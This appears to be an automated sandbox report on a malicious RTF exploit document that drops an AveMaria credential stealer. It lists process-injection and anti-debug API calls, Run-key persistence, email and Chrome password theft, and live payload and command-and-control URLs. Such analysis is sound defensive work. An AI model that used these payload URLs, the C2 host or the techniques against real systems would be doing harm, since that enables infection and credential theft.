Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0040290B FindFirstFileW,	5_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_0040756A _free,_free,FindFirstFileExW,	6_2_0040756A
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_0040761E FindFirstFileExW,FindNextFileW,FindClose,	6_2_0040761E
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_00408917 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,	8_2_00408917
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_0040DA4F FindFirstFileW,FindNextFileW,	8_2_0040DA4F
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_0040756A _free,_free,FindFirstFileExW,	9_2_0040756A
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_0040761E FindFirstFileExW,FindNextFileW,FindClose,	9_2_0040761E

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040D56A LoadLibraryA,GetProcAddress,

8_2_0040D56A

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_004024C4 mov eax, dword ptr fs:[00000030h]	6_2_004024C4
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_00406682 mov eax, dword ptr fs:[00000030h]	6_2_00406682
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_003C005F mov eax, dword ptr fs:[00000030h]	6_2_003C005F
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_003C013E mov eax, dword ptr fs:[00000030h]	6_2_003C013E
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_003C0109 mov eax, dword ptr fs:[00000030h]	6_2_003C0109
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_003C017B mov eax, dword ptr fs:[00000030h]	6_2_003C017B
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_0040E476 mov eax, dword ptr fs:[00000030h]	8_2_0040E476
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_0040E141 mov eax, dword ptr fs:[00000030h]	8_2_0040E141
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_0040E148 mov eax, dword ptr fs:[00000030h]	8_2_0040E148
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_00416192 mov eax, dword ptr fs:[00000030h]	8_2_00416192
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_004024C4 mov eax, dword ptr fs:[00000030h]	9_2_004024C4
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_00406682 mov eax, dword ptr fs:[00000030h]	9_2_00406682

Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 6_2_00401846 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_00401846

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 6_2_00404C25 GetProcessHeap,

6_2_00404C25

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_0040183A SetUnhandledExceptionFilter,	6_2_0040183A
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_00401846 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00401846
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_00405CCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00405CCC
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_00401D3D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00401D3D
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_0040183A SetUnhandledExceptionFilter,	9_2_0040183A
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_00401846 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00401846
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_00405CCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00405CCC
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_00401D3D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00401D3D

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\gnwnekc.exe protection: execute and read and write

Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040F6ED OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,

8_2_0040F6ED

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe

8_2_0040F7CD

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process created: C:\Users\user\AppData\Local\Temp\gnwnekc.exe "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Process created: C:\Users\user\AppData\Local\Temp\gnwnekc.exe C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040D2C9 AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,

8_2_0040D2C9

Source: gnwnekc.exe, 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\Microsoft Vision\05-01-2023_12.32.23{Program Manager}pData\Local\Temp\gnwnekc.exe}
Source: gnwnekc.exe, 00000008.00000002.1166073128.00000000031EF000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: RProgram Manager
Source: gnwnekc.exe, 05-01-2023_12.32.23.8.dr	Binary or memory string: {Program Manager}

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 6_2_00401A55 cpuid

6_2_00401A55

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 6_2_0040171D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_0040171D

Source: C:\Users\user\AppData\Roaming\word.exe

5_2_00403640

Lowering of HIPS / PFW / Operating System Security Settings

Increases the number of concurrent connection per server for Internet Explorer

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Stealing of Sensitive Information

Yara detected AveMaria stealer

Source: Yara match	File source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913528927.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913357063.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913377903.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gnwnekc.exe PID: 508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gnwnekc.exe PID: 2052, type: MEMORYSTR

Contains functionality to steal e-mail passwords

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: POP3 Password	8_2_00408DB8
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: SMTP Password	8_2_00408DB8
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: IMAP Password	8_2_00408DB8

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: \Google\Chrome\User Data\Default\Login Data

8_2_0040ADBB

Remote Access Functionality

Yara detected AveMaria stealer

Source: Yara match	File source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913528927.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913357063.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913377903.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gnwnekc.exe PID: 508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gnwnekc.exe PID: 2052, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	22 Native API	1 Create Account	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	23 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	23 Exploitation for Client Execution	1 Windows Service	1 Windows Service	2 Obfuscated Files or Information	221 Input Capture	1 Account Discovery	Remote Desktop Protocol	221 Input Capture	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 Endpoint Denial of Service
Domain Accounts	2 Service Execution	1 Registry Run Keys / Startup Folder	222 Process Injection	1 Software Packing	1 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	3 Masquerading	NTDS	1 System Network Connections Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Modify Registry	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	213 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Virtualization/Sandbox Evasion	Cached Domain Credentials	27 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Query Registry	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	222 Process Injection	Proc Filesystem	141 Security Software Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Users	/etc/passwd and /etc/shadow	2 Virtualization/Sandbox Evasion	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	2 Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf	28%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf	23%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.0.gnwnekc.exe.400000.5.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
8.2.gnwnekc.exe.400000.0.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
6.2.gnwnekc.exe.1c00000.4.unpack	100%	Avira	HEUR/AGEN.1244148	Download File

Domains

Source	Detection	Scanner	Label	Link
mcmac.duckdns.org	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://5.206.225.104/dll/freebl3.dll	100%	URL Reputation	malware
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://5.206.225.104/dll/nss3.dll	100%	URL Reputation	malware
http://5.206.225.104/dll/nss3.dll	100%	URL Reputation	malware
http://5.206.225.104/dll/softokn3.dll	100%	URL Reputation	malware
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://5.206.225.104/dll/mozglue.dll	9%	Virustotal		Browse
mcmac.duckdns.org	1%	Virustotal		Browse
mcmac.duckdns.org	0%	Avira URL Cloud	safe
http://5.206.225.104/dll/msvcp140.dll	10%	Virustotal		Browse
http://5.206.225.104/dll/vcruntime140.dll	0%	Avira URL Cloud	safe
http://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp:	0%	Avira URL Cloud	safe
http://5.206.225.104/dll/msvcp140.dll	0%	Avira URL Cloud	safe
http://5.206.225.104/dll/mozglue.dll	0%	Avira URL Cloud	safe
http://5.206.225.104/dll/vcruntime140.dll	8%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mcmac.duckdns.org	45.137.65.132	true	true	1%, Virustotal, Browse	unknown
transfer.sh	144.76.136.153	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
mcmac.duckdns.org	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://transfer.sh/get/8LtEmv/mwele.exe	false		high
http://transfer.sh/get/8LtEmv/mwele.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://5.206.225.104/dll/mozglue.dll	gnwnekc.exe	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	false		high
http://transfer.sh/get/8LtEm	EQNEDT32.EXE, 00000002.00000002.904802354.00000000005EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://transfer.sh/get/8LtEmv/mwele.exeip	EQNEDT32.EXE, 00000002.00000002.904789219.00000000005E2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://transfer.sh/	EQNEDT32.EXE, 00000002.00000002.904802354.00000000005EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://5.206.225.104/dll/freebl3.dll	gnwnekc.exe	true	URL Reputation: malware	unknown
http://www.diginotar.nl/cps/pkioverheid0	EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	word.exe, 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000000.901874794.000000000040A000.00000008.00000001.01000000.00000004.sdmp, mwele[1].exe.2.dr, word.exe.2.dr	false		high
http://transfer.sh/get/8LtEmv/mwele.exeO	EQNEDT32.EXE, 00000002.00000002.904708429.000000000058F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://5.206.225.104/dll/nss3.dll	gnwnekc.exe	true	URL Reputation: malware URL Reputation: malware	unknown
http://transfer.sh/get/8LtEmv/mwele.exej	EQNEDT32.EXE, 00000002.00000002.904708429.000000000058F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.google.com	gnwnekc.exe	false		high
https://transfer.sh/3	EQNEDT32.EXE, 00000002.00000002.904802354.00000000005EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://5.206.225.104/dll/softokn3.dll	gnwnekc.exe	true	URL Reputation: malware	unknown
http://ocsp.entrust.net0D	EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	false		high
http://transfer.sh/get/8LtEmv/mwele.exe4	EQNEDT32.EXE, 00000002.00000002.904708429.000000000058F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://5.206.225.104/dll/msvcp140.dll	gnwnekc.exe	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp:	gnwnekc.exe, 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, gnwnekc.exe, 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, gnwnekc.exe, 00000008.00000003.913528927.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, gnwnekc.exe, 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, gnwnekc.exe, 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, gnwnekc.exe, 00000008.00000003.913357063.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, gnwnekc.exe, 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, gnwnekc.exe, 00000008.00000003.913377903.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://5.206.225.104/dll/vcruntime140.dll	gnwnekc.exe	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.76.136.153	transfer.sh	Germany		24940	HETZNER-ASDE	false
45.137.65.132	mcmac.duckdns.org	Netherlands		204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	778329
Start date and time:	2023-01-05 12:32:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winRTF@10/15@2/2
EGA Information:	Successful, ratio: 80%
HDC Information:	Successful, ratio: 84.5% (good quality ratio 80%) Quality average: 84.3% Quality standard deviation: 26.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 136 Number of non-executed functions: 138
Cookbook Comments:	Found application associated with file extension: .rtf Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.93, 20.42.73.29, 20.189.173.22
Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, legacywatson.trafficmanager.net
Execution Graph export aborted for target EQNEDT32.EXE, PID 2724 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:32:14	API Interceptor	320x Sleep call for process: EQNEDT32.EXE modified
12:32:23	API Interceptor	429x Sleep call for process: gnwnekc.exe modified
12:32:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ldudbg C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\A
12:32:33	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ldudbg C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\A

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
144.76.136.153	pvv6dLm4nj.exe	Get hash	malicious	Browse	transfer.sh/get/SFHHxF/gru3xt3b.exe
	Quote List.doc	Get hash	malicious	Browse	transfer.sh/get/4KPgdY/mcland2.1.exe
	100112414_221209.doc	Get hash	malicious	Browse	transfer.sh/get/iqb7h3/noicnneland.exe
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.3863.8720.rtf	Get hash	malicious	Browse	transfer.sh/get/vO3WhH/nulight2.1.exe
	PO-AM2207586.xlsx	Get hash	malicious	Browse	transfer.sh/get/Xszsf2/fgc4.exe
	1.exe	Get hash	malicious	Browse	transfer.sh/get/b02fuU/Ikwtsw_Dlwusohh.jpg
	BZfApQSvig.exe	Get hash	malicious	Browse	transfer.sh/get/mv2A8U/Jpacuhx_Ytbwopcz.png
	l5LVNukfQm.exe	Get hash	malicious	Browse	transfer.sh/get/2bMMvr/Ftqhdpj_Dwbqyzci.jpg
	ksuO9C24QH.exe	Get hash	malicious	Browse	transfer.sh/get/qT523D/Wlniornez_Dablvtrq.bmp
	ksuO9C24QH.exe	Get hash	malicious	Browse	transfer.sh/get/qT523D/Wlniornez_Dablvtrq.bmp
	file.exe	Get hash	malicious	Browse	transfer.sh/get/EBgWOR/Jhkgft_Cptucfoi.bmp
	86503807.exe	Get hash	malicious	Browse	transfer.sh/get/Fh5qw1/Yviliqfen.log
	24982297.exe	Get hash	malicious	Browse	transfer.sh/get/7l55ti/Yqheqrnit.png
	67259493.exe	Get hash	malicious	Browse	transfer.sh/get/sP0JXy/12.png
